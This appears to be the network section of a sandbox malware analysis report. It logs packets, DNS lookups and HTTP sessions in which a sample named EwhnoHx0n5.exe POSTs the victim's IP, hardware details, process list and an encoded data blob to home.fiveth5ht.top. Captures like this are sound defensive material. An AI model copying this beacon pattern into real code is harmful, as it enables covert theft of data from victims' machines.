                                                      Dec 27, 2024 09:07:46.169862032 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.169903040 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.170047045 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.170064926 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.170200109 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.170309067 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.170552015 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.170578003 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.170710087 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.170737028 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.170797110 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.170816898 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.170912027 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.170928955 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.171027899 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.171042919 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.171216965 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.171348095 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.171382904 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.171439886 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.171617031 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.171627045 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.171740055 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.171749115 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.171905994 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.171988010 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.172039032 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.172048092 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.172122002 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.172132969 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.172214031 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.172223091 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.172261953 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.172326088 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.172435999 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.172518015 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.172557116 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.172604084 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.172703981 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.172729969 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.172832966 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.172854900 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.172930002 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.172986031 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.173002005 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.173032045 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.173106909 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.173135042 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.173173904 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.173219919 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.173345089 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.173399925 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.174669981 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.174715042 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.174894094 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.174957991 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.175023079 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.175048113 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.175205946 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.175215006 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.175307035 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.175348997 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.175438881 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.175467014 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.175651073 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.175662041 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.175738096 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.175765038 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.175853968 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.175863981 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.175935984 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.175945997 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.176013947 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.176105976 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.176115036 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.176125050 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.176217079 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.176225901 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.176299095 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.176309109 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.176394939 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.176403999 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:48.636255980 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:48.636444092 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:48.636689901 CET4972780192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:48.637173891 CET4972780192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:48.756572962 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:48.842360020 CET4973880192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:48.962157011 CET80497385.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:48.962760925 CET4973880192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:48.963059902 CET4973880192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:49.082616091 CET80497385.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:50.432768106 CET80497385.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:50.433193922 CET80497385.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:50.433198929 CET4973880192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:50.433249950 CET4973880192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:50.556720018 CET80497385.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:50.640073061 CET4974480192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:50.759825945 CET80497445.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:50.759936094 CET4974480192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:50.760302067 CET4974480192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:50.879903078 CET80497445.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:52.371377945 CET80497445.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:52.371503115 CET80497445.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:52.371767044 CET4974480192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:52.371813059 CET4974480192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:52.491318941 CET80497445.101.3.217192.168.2.9

                                                      UDP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Dec 27, 2024 09:07:39.184051037 CET6420753192.168.2.91.1.1.1
                                                      Dec 27, 2024 09:07:39.184245110 CET6420753192.168.2.91.1.1.1
                                                      Dec 27, 2024 09:07:39.322045088 CET53642071.1.1.1192.168.2.9
                                                      Dec 27, 2024 09:07:39.322060108 CET53642071.1.1.1192.168.2.9
                                                      Dec 27, 2024 09:07:43.927783966 CET6421053192.168.2.91.1.1.1
                                                      Dec 27, 2024 09:07:43.928049088 CET6421053192.168.2.91.1.1.1
                                                      Dec 27, 2024 09:07:44.069211960 CET53642101.1.1.1192.168.2.9
                                                      Dec 27, 2024 09:07:44.366570950 CET53642101.1.1.1192.168.2.9
                                                      Dec 27, 2024 09:07:48.703535080 CET6421253192.168.2.91.1.1.1
                                                      Dec 27, 2024 09:07:48.703603029 CET6421253192.168.2.91.1.1.1
                                                      Dec 27, 2024 09:07:48.841248035 CET53642121.1.1.1192.168.2.9
                                                      Dec 27, 2024 09:07:48.841331959 CET53642121.1.1.1192.168.2.9
                                                      Dec 27, 2024 09:07:50.501193047 CET6421453192.168.2.91.1.1.1
                                                      Dec 27, 2024 09:07:50.501250029 CET6421453192.168.2.91.1.1.1
                                                      Dec 27, 2024 09:07:50.639044046 CET53642141.1.1.1192.168.2.9
                                                      Dec 27, 2024 09:07:50.639061928 CET53642141.1.1.1192.168.2.9

                                                      DNS Queries

                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                      Dec 27, 2024 09:07:39.184051037 CET192.168.2.91.1.1.10x4a4cStandard query (0)httpbin.orgA (IP address)IN (0x0001)false
                                                      Dec 27, 2024 09:07:39.184245110 CET192.168.2.91.1.1.10xbf9Standard query (0)httpbin.org28IN (0x0001)false
                                                      Dec 27, 2024 09:07:43.927783966 CET192.168.2.91.1.1.10x102cStandard query (0)home.fiveth5ht.topA (IP address)IN (0x0001)false
                                                      Dec 27, 2024 09:07:43.928049088 CET192.168.2.91.1.1.10x177aStandard query (0)home.fiveth5ht.top28IN (0x0001)false
                                                      Dec 27, 2024 09:07:48.703535080 CET192.168.2.91.1.1.10x2649Standard query (0)home.fiveth5ht.topA (IP address)IN (0x0001)false
                                                      Dec 27, 2024 09:07:48.703603029 CET192.168.2.91.1.1.10x26f3Standard query (0)home.fiveth5ht.top28IN (0x0001)false
                                                      Dec 27, 2024 09:07:50.501193047 CET192.168.2.91.1.1.10x7379Standard query (0)home.fiveth5ht.topA (IP address)IN (0x0001)false
                                                      Dec 27, 2024 09:07:50.501250029 CET192.168.2.91.1.1.10x314Standard query (0)home.fiveth5ht.top28IN (0x0001)false

                                                      DNS Answers

                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                      Dec 27, 2024 09:07:33.777765036 CET1.1.1.1192.168.2.90xe748No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                      Dec 27, 2024 09:07:33.777765036 CET1.1.1.1192.168.2.90xe748No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                      Dec 27, 2024 09:07:39.322045088 CET1.1.1.1192.168.2.90x4a4cNo error (0)httpbin.org3.218.7.103A (IP address)IN (0x0001)false
                                                      Dec 27, 2024 09:07:39.322045088 CET1.1.1.1192.168.2.90x4a4cNo error (0)httpbin.org34.226.108.155A (IP address)IN (0x0001)false
                                                      Dec 27, 2024 09:07:44.069211960 CET1.1.1.1192.168.2.90x102cNo error (0)home.fiveth5ht.top5.101.3.217A (IP address)IN (0x0001)false
                                                      Dec 27, 2024 09:07:48.841248035 CET1.1.1.1192.168.2.90x2649No error (0)home.fiveth5ht.top5.101.3.217A (IP address)IN (0x0001)false
                                                      Dec 27, 2024 09:07:50.639044046 CET1.1.1.1192.168.2.90x7379No error (0)home.fiveth5ht.top5.101.3.217A (IP address)IN (0x0001)false

                                                      HTTP Request Dependency Graph

                                                      • httpbin.org
                                                      • home.fiveth5ht.top

                                                      HTTP Packets

                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      0192.168.2.9497275.101.3.217801688C:\Users\user\Desktop\EwhnoHx0n5.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 27, 2024 09:07:44.544317007 CET12360OUTPOST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1
                                                      Host: home.fiveth5ht.top
                                                      Accept: */*
                                                      Content-Type: application/json
                                                      Content-Length: 560227
                                                      Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 34 38 35 39 30 39 31 33 37 32 30 36 34 33 35 39 31 36 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 35 30 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 [TRUNCATED]
                                                      Data Ascii: { "ip": "8.46.123.189", "current_time": "8485909137206435916", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 50, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 328 }, { "name": "csrss.exe", "pid": 412 }, { "name": "wininit.exe", "pid": 488 }, { "name": "csrss.exe", "pid": 496 }, { "name": "winlogon.exe", "pid": 584 }, { "name": "services.exe", "pid": 632 }, { "name": "lsass.exe", "pid": 640 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 880 }, { "name": "svchost.exe", "pid": 928 }, { "name": "dwm.exe", "pid": 992 }, { "name": "svchost.exe", "pid": 436 }, { "name": "svchost.exe", "pid": 376 }, { "name": "svchost.exe", "pid": 792 }, { "name": "svchost.exe" [TRUNCATED]
                                                      Dec 27, 2024 09:07:44.664118052 CET4944OUTData Raw: 48 4a 63 33 70 59 62 43 35 7a 67 59 79 62 56 44 45 56 73 4e 68 63 58 6a 71 45 38 4a 69 6b 6d 36 47 4a 77 32 4b 72 30 6e 4a 54 6f 31 4a 55 38 52 54 71 55 59 66 7a 66 34 78 2b 41 6e 69 44 34 46 5a 76 67 38 73 34 30 77 75 42 72 34 58 4e 4b 48 74 73
                                                      Data Ascii: HJc3pYbC5zgYybVDEVsNhcXjqE8Jikm6GJw2Kr0nJTo1JU8RTqUYfzf4x+AniD4FZvg8s40wuBr4XNKHtsr4gyOti8bkGYzhGLxOFw+LxeBy7EQxuCc1HFYTFYPDVlGVOvSjVwtWlXqUaKsVBsf2\/L\/7Kv1Y\/GxKKKKACoX\/1kdfaH\/BP74V+A\/jb+1v8Kfhh8TtCHiXwP4nXx1\/bmiHUdW0g3o0T4ceL\/EemganoV9
                                                      Dec 27, 2024 09:07:44.664195061 CET7416OUTData Raw: 37 5c 2f 41 48 2b 69 5c 2f 77 43 66 71 61 68 33 50 49 76 79 66 75 75 42 46 35 59 5c 2f 66 5c 2f 38 41 38 46 5c 2f 6e 72 51 61 6a 47 32 66 4f 6a 76 38 41 75 66 36 65 76 76 36 66 35 7a 52 5c 2f 46 73 5c 2f 64 5c 2f 76 50 39 56 2b 39 39 50 38 5c 2f
                                                      Data Ascii: 7\/AH+i\/wCfqah3PIvyfuuBF5Y\/f\/8A8F\/nrQajG2fOjv8Auf6evv6f5zR\/Fs\/d\/vP9V+99P8\/r3qST93s2Tb383zZZP+eP5d\/yxSeXH\/H87\/8ALKST\/X\/5\/lQdAH+B9+zy4v3Un+i\/y9exqsshVkd\/+nf3n\/4+vr1+lWfLdv4\/OST\/AJadPpnHFNeP5tiP5yCXv\/yx\/wD1f\/X+oBGJH8x9\/mHH\
                                                      Dec 27, 2024 09:07:44.664237022 CET4944OUTData Raw: 2b 76 56 5a 6f 5c 2f 62 35 50 35 41 66 35 34 78 6e 33 6f 4f 6e 33 5c 2f 77 43 37 2b 4a 44 49 75 50 76 5c 2f 41 50 4c 54 31 37 59 5c 2f 7a 2b 57 66 53 6f 68 76 5c 2f 6a 7a 37 5a 5c 2f 7a 6a 30 36 56 59 6c 5c 2f 69 5c 2f 44 2b 6c 52 2b 58 37 5c 2f
                                                      Data Ascii: +vVZo\/b5P5Af54xn3oOn3\/wC7+JDIuPv\/APLT17Y\/z+WfSohv\/jz7Z\/zj06VYl\/i\/D+lR+X7\/AKf\/AF6Dan1+X6kdQN32f5\/z79\/arLLt9xUMnb8f6UHYUPn+fj7\/AF6dB\/n25pd3\/LPt\/wDW+lWfL53\/AP6+vX6Z7evtVWSP5f8AWfXnP+f8ig0p9fl+oeZ\/9t7dT+P8un41DI3mdc\/6z\/Pr70N0X\
                                                      Dec 27, 2024 09:07:44.664340973 CET2472OUTData Raw: 5c 2f 62 38 2b 4d 66 77 2b 2b 4e 6e 78 6c 38 4d 2b 4a 5c 2f 68 6a 72 76 5c 2f 43 53 2b 48 64 4e 2b 47 47 69 65 48 72 7a 55 7a 70 65 74 36 4e 35 65 74 57 76 69 6e 78 6e 71 56 7a 5a 4c 5a 36 5c 2f 70 6d 6c 33 30 67 68 73 74 57 30 36 55 33 4b 57 78
                                                      Data Ascii: \/b8+Mfw++Nnxl8M+J\/hjrv\/CS+HdN+GGieHrzUzpet6N5etWvinxnqVzZLZ6\/pml30ghstW06U3KWxtXNwY45nkhmVP9KP2Wvg99IDwz+k5TzHjLwp8YeAeEcz4G4oy\/N8w4n4E4z4X4dxlaMcFisrweYYvNsqwOXVqyxtGNbAUa9SVRV4OVCPNzH+cf7SXxW8D\/EP6O1XAcJeJfhTxvxTl\/GfDeOyrA8O8acJcR59hK
                                                      Dec 27, 2024 09:07:44.664352894 CET2472OUTData Raw: 5c 2f 59 65 5c 2f 5a 77 2b 4a 47 69 66 46 33 34 4e 66 41 32 33 38 49 5c 2f 45 54 77 35 62 36 76 62 61 46 34 6a 6d 2b 49 48 78 56 38 55 53 61 58 48 72 75 6b 33 6d 68 61 73 31 70 70 33 6a 44 78 7a 34 67 30 64 4c 69 38 30 66 55 4c 5c 2f 41 45 35 72
                                                      Data Ascii: \/Ye\/Zw+JGifF34NfA238I\/ETw5b6vbaF4jm+IHxV8USaXHruk3mhas1pp3jDxz4g0dLi80fUL\/AE5rv+zzdRWt5cxwTRCaTd94V8pleXVMHhpUq805uvUqp0KtaMeWdOlC0reycmvZtq6fLe8Xds\/q\/wAJPDLMOB+GcTk\/EGMpV8ZUz3MM0oyyDN87w2EWHxuW5VgfZ1+RZVOvWhLL6koe2oVlh1OM8PVjUnUa\/GT9q
                                                      Dec 27, 2024 09:07:44.664365053 CET2472OUTData Raw: 66 5c 2f 57 7a 2b 58 34 31 44 5c 2f 74 5c 2f 38 73 5c 2f 38 41 36 5c 2f 35 39 4f 50 72 78 31 6f 4f 77 68 2b 38 76 7a 2b 6e 53 50 6e 5c 2f 50 74 2b 50 46 51 74 5c 2f 63 32 5c 2f 54 50 38 5c 2f 38 41 4a 2b 76 65 72 6b 69 66 4b 6e 79 66 39 2b 38 5c
                                                      Data Ascii: f\/Wz+X41D\/t\/8s\/8A6\/59OPrx1oOwh+8vz+nSPn\/Pt+PFQt\/c2\/TP8\/8AJ+verkifKnyf9+8\/09Pr\/wDXhjCfO\/8AH\/y1\/wA\/5\/Wgql0\/w\/5EPl\/9Maik\/Pjzf9b1qWQ\/7Gz\/AK6S\/r0\/zjpTP7ibY+evbyfpQdxDJs+R\/uPn\/nrx\/kdu34Uz5\/vom\/8A6d\/wH5n+nFOH3I\/\/AGp\/x
                                                      Dec 27, 2024 09:07:44.783890963 CET2472OUTData Raw: 78 79 50 6a 2b 34 6b 66 2b 71 5c 2f 66 58 58 5c 2f 67 4c 2b 75 54 52 38 66 6c 62 35 37 5c 2f 64 32 4e 4b 66 58 35 66 71 45 6e 37 7a 5a 76 66 5a 35 6b 56 76 35 76 37 6e 39 50 38 41 48 76 78 2b 4e 44 53 4f 6d 45 5c 2f 6a 5c 2f 77 42 55 4a 50 4e 38
                                                      Data Ascii: xyPj+4kf+q\/fXX\/gL+uTR8flb57\/d2NKfX5fqEn7zZvfZ5kVv5v7n9P8AHvx+NDSOmE\/j\/wBUJPN8\/wDz0\/Cnyf6xPJ\/55W8v2jzcfr\/9eoZNnzO6eT+98r95\/nv9c8VmaDN3l73CDf5o\/d\/89vp\/L\/PJteT508zfzJ\/rT++97S0FPXKsiI+9\/wDW+ZJL\/nnGaiLc\/f2QmX97\/wA8M5\/z0\/L009n5\
                                                      Dec 27, 2024 09:07:44.783942938 CET7416OUTData Raw: 73 72 39 50 6b 31 47 78 75 5a 49 37 53 34 74 50 6b 65 46 5a 55 6a 41 6d 6c 45 30 6e 38 54 72 48 35 59 4a 39 6c 33 4e 6a 38 53 54 56 36 4b 79 66 5c 2f 68 59 76 6a 54 34 61 54 36 78 34 51 73 4c 5c 2f 41 4f 48 45 2b 75 33 76 6a 6e 78 6a 71 50 69 4c
                                                      Data Ascii: sr9Pk1GxuZI7S4tPkeFZUjAmlE0n8TrH5YJ9l3Nj8STV6Kyf\/hYvjT4aT6x4QsL\/AOHE+u3vjnxjqPiL7P8ADXwv4B8P28Go3nxZ1XxTHp892vw+vNEvdK1nQLq10O78R+KRrvh3QvDPhrV\/F\/iLRPDl\/i6vrPhC10zxj4g8K\/Fr4O\/FPwz4E+HPhn4o+IdZ+HWr\/FDzrXwx4l+Kdh8ICZtA+Inwf+HXiTS77Q\/Fet
                                                      Dec 27, 2024 09:07:44.783958912 CET4944OUTData Raw: 62 38 66 36 56 48 51 61 65 30 38 76 78 5c 2f 77 43 41 52 79 64 76 78 5c 2f 70 55 64 57 4b 67 32 50 37 66 6c 5c 2f 38 41 5a 55 48 52 37 54 79 5c 2f 48 5c 2f 67 45 4c 39 66 77 5c 2f 71 61 68 5a 64 33 38 76 72 56 68 2b 6e 34 5c 2f 30 4e 4e 77 5c 2f
                                                      Data Ascii: b8f6VHQae08vx\/wCARydvx\/pUdWKg2P7fl\/8AZUHR7Ty\/H\/gEL9fw\/qahZd38vrVh+n4\/0NNw\/v8An\/8AXrb3\/wC7+JoU9vl\/oc\/ypalk6J9D\/Ooqo7vf\/u\/iQy9\/93\/GmcMPY1M\/T8f6GoqCiv5ez3z3\/p2qOTt+P9KtP90\/h\/MVDWfs\/P8AD\/gnQV6jk7fj\/Sp26L9P6CmVmdBHJ2\/H+lR1Y
                                                      Dec 27, 2024 09:07:44.827817917 CET27192OUTData Raw: 47 50 6a 6e 34 55 66 46 4c 77 76 5c 2f 77 41 45 33 76 32 6e 50 67 70 38 4d 62 4e 5c 2f 44 48 6a 53 62 78 48 34 44 2b 4d 50 6a 6a 5c 2f 67 70 73 6e 78 79 2b 47 6e 68 32 33 38 62 32 58 68 32 36 73 37 4c 78 64 59 66 73 35 72 63 65 4a 39 4e 2b 4a 47
                                                      Data Ascii: GPjn4UfFLwv\/wAE3v2nPgp8MbN\/DHjSbxH4D+MPjj\/gpsnxy+Gnh238b2Xh26s7LxdYfs5rceJ9N+JGkeIE07w3rtnALTxdpXxDg062T76uND0S7kWa60fSrmZcbZbjT7SaRcYxteSFmGMDGDxgelRHw54eLiQ6DopkUYVzpdiXA54DeRkDk8A9z6muLin6GuVcS8TZ3xJHjfO8tq57nGNzXFUMJSoxt9e4bxPC06CrLlqzh
                                                      Dec 27, 2024 09:07:48.636255980 CET157INHTTP/1.1 200 OK
                                                      Server: nginx/1.22.1
                                                      Date: Fri, 27 Dec 2024 08:07:48 GMT
                                                      Content-Type: text/html; charset=utf-8
                                                      Content-Length: 1
                                                      Connection: close
                                                      Data Raw: 30
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      1192.168.2.9497385.101.3.217801688C:\Users\user\Desktop\EwhnoHx0n5.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 27, 2024 09:07:48.963059902 CET98OUTGET /OyKvQKriwnyyWjwCxSXF1735186862?argument=0 HTTP/1.1
                                                      Host: home.fiveth5ht.top
                                                      Accept: */*
                                                      Dec 27, 2024 09:07:50.432768106 CET372INHTTP/1.1 404 NOT FOUND
                                                      Server: nginx/1.22.1
                                                      Date: Fri, 27 Dec 2024 08:07:50 GMT
                                                      Content-Type: text/html; charset=utf-8
                                                      Content-Length: 207
                                                      Connection: close
                                                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a
                                                      Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      2192.168.2.9497445.101.3.217801688C:\Users\user\Desktop\EwhnoHx0n5.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 27, 2024 09:07:50.760302067 CET171OUTPOST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1
                                                      Host: home.fiveth5ht.top
                                                      Accept: */*
                                                      Content-Type: application/json
                                                      Content-Length: 31
                                                      Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d
                                                      Data Ascii: { "id1": "0", "data": "Done1" }
                                                      Dec 27, 2024 09:07:52.371377945 CET372INHTTP/1.1 404 NOT FOUND
                                                      Server: nginx/1.22.1
                                                      Date: Fri, 27 Dec 2024 08:07:52 GMT
                                                      Content-Type: text/html; charset=utf-8
                                                      Content-Length: 207
                                                      Connection: close
